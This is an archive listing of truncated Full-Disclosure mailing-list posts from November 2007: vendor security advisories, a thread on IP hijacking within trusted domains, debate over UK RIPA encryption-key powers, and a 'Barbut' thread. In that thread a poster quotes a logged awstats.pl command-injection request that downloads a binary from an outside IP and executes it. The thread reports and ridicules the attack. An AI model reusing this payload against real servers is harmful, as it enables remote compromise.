[Full-disclosure] Warning: Hackers hijacking unused IP Addresses inside Trusted domains [POC]

*Domain Name System Hijacked: Hackers Abuse Domain-Name Trust* *InternetWorld's ** Andy Patrizio **and Finjan's Yuval Ben-Itzahk discuss the fundamental weaknesses in Finjan's Bl

[Full-disclosure] Websense security contact?

Yup you can either email [EMAIL PROTECTED] or I can help you. From: [EMAIL PROTECTED] on behalf of The Security Community Sent: Tue 11/20/2007 2:43 PM To: Full-Disclosure Subject: [Full-disclosure] Websense security contact? Thanks in advance.

Re: [Full-disclosure] Warning: Hackers hijacking unused IP Addresses inside Trusted domains [POC]

--On Wednesday, November 21, 2007 21:45:35 +1100 XSS Worm XSS Security Information Portal <[EMAIL PROTECTED]> wrote: > > In the case of Yahoo, security firm Finjan said hackers exploited an > unused IP address within Yahoo's hierarchy and used that as the domain > address behind a forged Google An

[Full-disclosure] rPSA-2007-0243-1 flac

rPath Security Advisory: 2007-0243-1 Published: 2007-11-21 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/1.1.2-5.2-1 rPath Issue Tracking System: https://issues.rpath.com/b

Re: [Full-disclosure] RIPA powers being used

- Original Message - From: "James Rankin" <[EMAIL PROTECTED]> To: Sent: Tuesday, November 20, 2007 3:46 AM Subject: [Full-disclosure] RIPA powers being used > RIPA is finally being used to force people to hand over encryption keys... > > http://news.bbc.co.uk/1/hi/technology/7102180.stm

[Full-disclosure] rPSA-2007-0245-2 kernel

rPath Security Advisory: 2007-0245-2 Published: 2007-11-21 Updated: 2007-11-21 Fix trove entry for rLS Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Severe Exposure Level Classification: Remote User Deterministic Denial of Service Updated Versions: [E

[Full-disclosure] rPSA-2007-0245-1 kernel

rPath Security Advisory: 2007-0245-1 Published: 2007-11-21 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Severe Exposure Level Classification: Remote User Deterministic Denial of Service Updated Versions: [EMAIL PROTECTED]:1/2.6.22.13-0.2-1 [EMAIL PRO

Re: [Full-disclosure] Warning: Hackers hijacking unused IP Addresses inside Trusted domains [POC]

On Wed, 21 Nov 2007, Paul Schmehl wrote: > If Yahoo was able to fix the problem quickly, then it would appear that Yahoo > had a compromised domain server or servers. We all get pwned at one point or another, how we respond is what matters. > > -- > Paul Schmehl ([EMAIL PROTECTED]) > Senior In

Re: [Full-disclosure] RIPA powers being used

...Can't they just use the NSA created backdoor to bypass the encryption? ;-) --=Q=-- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Morning Wood Sent: Wednesday, November 21, 2007 12:52 PM To: James Rankin; full-disclosure@lists.grok.org.uk Subject:

[Full-disclosure] Barbut

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Anyone else seen these really 3l337 attacks? From: 196.212.26.82 GET /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.0 Host: [removed] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

Re: [Full-disclosure] Barbut

On Wed, 21 Nov 2007 14:20:22 EST, Simon Smith said: > Anyone else seen these really 3l337 attacks? > GET > /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| > gotta love script kids... The truly sad part is that the script apparently sti

Re: [Full-disclosure] Barbut

Vladis, Got that right... this vulnerability was released ages ago if memory serves right. Whats funny is that I am not using a linux host and I do not use awstats anyway... makes the attack even more pathetic. [EMAIL PROTECTED] wrote: > On Wed, 21 Nov 2007 14:20:22 EST, Simon Smith said:

Re: [Full-disclosure] Wordpress Cookie Authentication Vulnerability

comment inline ;) On Nov 20, 2007 8:23 PM, Steven Adair <[EMAIL PROTECTED]> wrote: > Right this problem has existed for a long time, but it's not the end of > the world for someone to point it out again I suppose. > > I think it's obvious that there's another main issue here and that's the > way W

[Full-disclosure] [SECURITY] [DSA 1408-1] New kdegraphics packages fix arbitrary code execution

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1408-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 21, 2007

[Full-disclosure] [ MDKSA-2007:224-1 ] - Updated samba packages fix vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:224-1 http://www.mandriva.com/security/ ___

Re: [Full-disclosure] RIPA powers being used

lol its always the lamest people that make responses like these are you scared they will steal your latest post auth dos in a ftpd that no one uses? On Nov 21, 2007 11:51 AM, Morning Wood <[EMAIL PROTECTED]> wrote: > - Original Message - > From: "James Rankin" <[EMAIL PROTECTED]> > To:

Re: [Full-disclosure] Barbut

It's all about the law of averages, kind of like spam. Hit enough hosts with some cheap automated script and you're bound to get some sort of hit on it sooner or later. For most script kiddies this is good enough. Scan 1 hosts and get 1 hit, sure, new toy to play with. On Nov 22, 2007,